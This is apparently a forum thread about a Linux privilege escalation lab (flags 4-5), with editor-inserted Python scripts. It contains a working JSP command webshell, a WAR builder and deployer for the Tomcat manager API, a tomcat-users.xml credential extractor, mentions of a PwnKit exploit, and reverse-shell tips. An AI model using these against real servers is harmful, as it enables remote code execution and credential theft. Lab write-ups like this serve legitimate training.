Linux Local Privilege Escalation - Skills Assessment

Hello,
I am stuck at flag4. So, to be honest, I don't have any idea how I should proceed. I saw that the tomcat folder has the "S" priv, but no idea how I should proceed. Should I look for some specific logs?

EDIT: I found a user, tomcatadm, with its password. But it is not the actual user tomcat for flag4. What am I missing? What is this user?

I don't know if this is still relevant, but you should think about where else you could use the found credentials.

With the credentials and the admin login page, you can deploy a reverse shell via file upload and trigger it. You can get flag 4, and flag 5 is not hard. GTFOBins helps you escalate privileges.

Trying to get to flag4. I uploaded a WAR webshell to Tomcat via the manager panel. It appears in the Applications list, but will not execute. It just gives me a 404 error, even though I've completely removed all the authorization logic from the backdoor (IP address check). I tried all path variations like /cmd, /cmd/cmd.jsp?cmd=, but no luck. I used a webshell from the Laudanum directory. Am I doing something wrong? Any other ways to get to tomcat's user shell?

Solved it. I just needed to specify the 'warfiles' directory inside the archive that was created by the script, like: /cmd/warfiles/cmd.jsp?cmd=id

Hi everyone,

I am at flag5. I have a webshell and am trying to get a meterpreter revshell using the multi/http/tomcat_mgr_upload module.

I set username, password, RPORTS, LPORT=8080, but when I start the exploit it gives back this message:

Does somebody know why the server does not return a fingerprint even though it is clearly running on 8080?

Btw: does somebody know how to execute msfvenom WAR payloads on the webserver? Do I just need to click on it? I only get an error message and no callback to my multi/handler.

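Added example (editor's, not code from any poster in this thread): the 404s in the two posts above both come down to where the JSP sits inside the WAR. Tomcat serves every archive entry at `<context>/<entry path>`, so a shell stored as `warfiles/cmd.jsp` in `cmd.war` answers on `/cmd/warfiles/cmd.jsp`, not `/cmd/cmd.jsp`, and an msfvenom WAR also has to be requested at its JSP's path rather than "clicked". The script below builds a WAR with the JSP at a chosen path, lists the URLs the JSPs will answer on, parses the manager text API's application list, and (only when called) deploys through `/manager/text/deploy`. The JSP payload, the context-path rule (WAR file name minus `.war`) and the manager URL layout are my assumptions for a default Tomcat 9; the sample list output is constructed.

```python
"""Package a JSP as a WAR and work out the URL the deployed JSP answers on.

Added example, not the thread's or Laudanum's code. Assumptions: the context
path equals the WAR file name without '.war' (how the manager HTML upload
names it), entries under WEB-INF/ and META-INF/ are never served directly,
and the manager text API lives at /manager/text/ (needs the manager-script role).
"""
import base64
import io
import re
import urllib.request
import zipfile

# Minimal JSP command runner (constructed for this example; not Laudanum's cmd.jsp).
CMD_JSP = r"""<%@ page import="java.io.*" %>
<% String c = request.getParameter("cmd");
   if (c != null) {
     Process p = Runtime.getRuntime().exec(c);
     BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
     String l; while ((l = r.readLine()) != null) { out.println(l); }
   } %>"""


def build_war(jsp_source, jsp_path="cmd.jsp"):
    """Return WAR bytes with the JSP stored at jsp_path inside the archive.

    A WAR is a zip. Storing the JSP as 'warfiles/cmd.jsp' is exactly what moves
    it to /<context>/warfiles/cmd.jsp on the server.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        # An (empty) descriptor is optional on Tomcat 9 but harmless.
        war.writestr("WEB-INF/web.xml",
                     '<?xml version="1.0"?><web-app version="3.0"/>')
        war.writestr(jsp_path, jsp_source)
    return buf.getvalue()


def jsp_urls(war_name, war_bytes):
    """URLs (relative to the server root) at which the JSPs in the WAR answer."""
    context = "/" + re.sub(r"\.war$", "", war_name)
    urls = []
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for entry in war.namelist():
            if entry.endswith(".jsp") and not entry.startswith(("WEB-INF/", "META-INF/")):
                urls.append(f"{context}/{entry}")
    return urls


def parse_manager_list(text):
    """Parse /manager/text/list output into {context_path: state}.

    Each line after the 'OK - ...' header is  /path:state:sessions:docbase
    """
    apps = {}
    for line in text.splitlines()[1:]:
        parts = line.split(":")
        if len(parts) >= 4:
            apps[parts[0]] = parts[1]
    return apps


def deploy_war(base_url, user, password, war_name, war_bytes):
    """PUT the WAR through the manager text API. Network call; not run by the tests."""
    context = "/" + re.sub(r"\.war$", "", war_name)
    req = urllib.request.Request(
        f"{base_url}/manager/text/deploy?path={context}&update=true",
        data=war_bytes, method="PUT")
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode()
```

Usage: `war = build_war(CMD_JSP, "warfiles/cmd.jsp")`, then `deploy_war("http://target:8080", user, password, "cmd.war", war)` and request `jsp_urls("cmd.war", war)[0] + "?cmd=id"`. If `parse_manager_list` shows the context as `running` but the JSP URL still 404s, list the archive entries; the path in the URL has to match the entry path byte for byte.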

I am stuck on flag4, I need help. Thx

There is a way to do this box without going the Tomcat route, if you have a precompiled binary.


Yep, you can eat a sandwich as barry.

How do I do it? I compile it with make on my machine, and when I run it on the client I get: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found

Please help

Or compile with the glibc included with -shared, or move the source files to the victim's machine and compile from there.
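Added example (editor's, not from either poster above): the loader error `version GLIBC_2.34 not found` means the binary was linked against a newer glibc than the target ships, and ld.so refuses to start it. The fix that bundles glibc into the binary is static linking (`gcc -static -o exploit exploit.c`), or building on the target as suggested. The check below reproduces the loader's decision offline: it pulls every `GLIBC_x.y` symbol version the binary references, keeps the highest, and compares it with the target's glibc. The ELF bytes are a constructed sample; `target_glibc_version()` is meant to be run on the target itself and is an assumption about its `gnu_get_libc_version()` being reachable through ctypes on Linux.

```python
"""Check whether a compiled exploit's glibc requirement fits the target.

Added example. Versioned symbol references are stored in the ELF's version
tables as 'GLIBC_<major>.<minor>' strings; a plain byte scan is enough to
recover them and is what `strings exploit | grep GLIBC_` would show.
"""
import ctypes
import ctypes.util
import re

_VER = re.compile(rb"GLIBC_(\d+)\.(\d+)")


def required_glibc(elf_bytes):
    """Highest GLIBC_major.minor referenced in the binary (ld.so requires all of them)."""
    versions = {(int(m.group(1)), int(m.group(2))) for m in _VER.finditer(elf_bytes)}
    return max(versions) if versions else (0, 0)


def target_glibc_version():
    """glibc version of the host this runs on, as (major, minor). Linux only."""
    libc = ctypes.CDLL(ctypes.util.find_library("c"))
    libc.gnu_get_libc_version.restype = ctypes.c_char_p
    major, minor = libc.gnu_get_libc_version().decode().split(".")[:2]
    return int(major), int(minor)


def will_load(required, available):
    """True when every referenced symbol version exists on the target."""
    return required <= available


def looks_dynamic(elf_bytes):
    """Heuristic: a dynamically linked binary names its interpreter (ld-linux*)."""
    return b"ld-linux" in elf_bytes


# Constructed sample of what a build on a glibc 2.35 box typically references.
SAMPLE_ELF = (b"\x7fELF" + b"\0" * 60
              + b"/lib64/ld-linux-x86-64.so.2\0"
              + b"GLIBC_2.2.5\0GLIBC_2.34\0GLIBC_2.4\0"
              + b"__libc_start_main\0puts\0GLIBC_PRIVATE\0")
```

Usage: on the attack box, `required_glibc(open("exploit", "rb").read())`; on the target, `target_glibc_version()` (or just `ldd --version`). If `will_load()` is false and `looks_dynamic()` is true, rebuild with `-static` and `looks_dynamic()` should flip to false.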

That was a fun one and not too difficult, but it's most probably also due to the fact that I'm getting used to HTB: passwords not working → reset machine; pages not showing up → reset machine; can't ping anymore → reset machine. Wrong explanations or hints, blah blah blah.

But it seems like Linux privilege escalation is one of my favorite things. Fun to scratch one's head and find all the ways you can bypass those restrictions :stuck_out_tongue:

This was surprisingly easy, considering I have spent about a month slowly going through the entire module. I think in total from flag 1 to flag 5 took less than 30 minutes. For anyone struggling with flags 1-3, enumeration is your friend. I started out looking for the location of all the flags with find / -name "*flag1.txt*" 2>/dev/null. The wildcards are important here, and don't forget to specify the flag number; I had issues trying to find them all at once. You will find flag 1 easily like this. Flag 2, once you find the location, the rest is HISTORY :wink:. Flag 3, again, enumerate. Flag 4 I think I was pretty lucky to find so quickly. I had previously done a box which used the exact same method, and it was the first thing I thought of when seeing the service that was running. Remember, it's okay to lose the battle as long as you win the WAR :wink:. If you are struggling to get the rev shell, try creating the payload with msfvenom; I had no issues with it. Flag 5 I think is easier than flag 4. GTFOBins is your friend. The only issue I encountered was the method not working on my restricted shell. I had to upgrade to an interactive TTY with python before I was able to finally get root.

Right now I'm trying to get into the box by popping a shell rather than using the SSH credentials provided. So far that has been harder than all the flags, and I haven't been able to find much info online about the method other than keep trying and keep enumerating. If anyone has any tips for that, it would be very much appreciated.

All in all, this was a nice confidence booster but I also think the methods used to get the flags are way less complicated than the methods that you learn going through the module. I was expecting to spend a lot of time on this but I think it just goes to show that even if you feel like you’re not learning much or that you’re progressing very slowly, subconsciously you are learning way more than you think. For reference, I’ve been on the PT path for close to 9 months, trying to find time to complete the modules between work and other activities.

Good luck everyone!

I am stuck with flag4… I can't find the tomcatadm password… I have tried many things and keep trying to obtain a root shell by exploiting the sudo version…

To capture the flags using the Tomcat reverse shell approach, pay attention to the files under the directory /etc/tomcat9/; you can get the password for tomcatadm there.

Another, simpler approach is to attack the Polkit vulnerability CVE-2021-4034. You may download CVE-2021-4034.py, transfer it to the target and execute the script; you get the root shell there.
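Added example (editor's, not from the poster above): the file under /etc/tomcat9/ that carries manager credentials is tomcat-users.xml, and what matters besides the password is the roles attached to the user. The manager HTML page is gated on `manager-gui`, the text API that msf's `tomcat_mgr_upload` and curl use is gated on `manager-script`, and a valid password with neither role gets Tomcat's 403 page rather than a working login. The script below parses a tomcat-users.xml and reports each user's password and manager rights. The sample file is constructed for the example and is not the lab's; the role-to-endpoint mapping is Tomcat 9's default manager web.xml.

```python
"""Read a tomcat-users.xml and report who can reach the manager app, and how.

Added example. Assumes the standard <tomcat-users><role/><user/></tomcat-users>
layout Tomcat 9 ships in /etc/tomcat9/tomcat-users.xml (Debian/Ubuntu) or
$CATALINA_BASE/conf/tomcat-users.xml; the sample below is constructed.
"""
import xml.etree.ElementTree as ET

# Roles the manager application checks (Tomcat 9 default manager web.xml).
MANAGER_ROLES = {
    "manager-gui": "HTML interface /manager/html (browse, upload WAR)",
    "manager-script": "text API /manager/text/* (msf tomcat_mgr_upload, curl)",
    "manager-jmx": "JMX proxy /manager/jmxproxy",
    "manager-status": "status page /manager/status only",
}

SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="deploy" password="Example-Deploy-Pass" roles="manager-gui,manager-script"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
  <user username="hostadmin" password="x" roles="admin-gui"/>
</tomcat-users>
"""


def parse_tomcat_users(xml_text):
    """Return {username: {"password": str, "roles": set}} for every <user> element.

    Tomcat 9's file declares a default namespace, so tags are matched on their
    local name. Both 'username' (current) and 'name' (legacy) attributes work.
    """
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    users = {}
    for el in root.iter():
        if el.tag.split("}")[-1] != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        name = el.get("username") or el.get("name") or ""
        users[name] = {"password": el.get("password", ""), "roles": roles}
    return users


def manager_access(users):
    """Map each user to the manager roles they hold; an empty set means the
    manager app answers 403 for them even with the right password."""
    return {name: info["roles"] & set(MANAGER_ROLES) for name, info in users.items()}


def describe(users):
    """Human-readable lines, one per user, for a quick look from a shell."""
    lines = []
    for name, roles in manager_access(users).items():
        what = ", ".join(MANAGER_ROLES[r] for r in sorted(roles)) or "no manager access"
        lines.append(f"{name}:{users[name]['password']} -> {what}")
    return lines
```

Usage: `describe(parse_tomcat_users(open("/etc/tomcat9/tomcat-users.xml").read()))`. If the user you found has only `manager-gui`, the msf module (text API) will fail while the HTML upload works, and the reverse holds for `manager-script` only.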

I found out how; it's not that hard. Reply if you need help.

I have the Tomcat credentials, but the web login doesn't seem to work. Every time I enter the creds it just brings up the simple HTTP login again. I'm not getting "login failed" etc. Is there more than one set of creds for Tomcat? Or is this machine just flaky?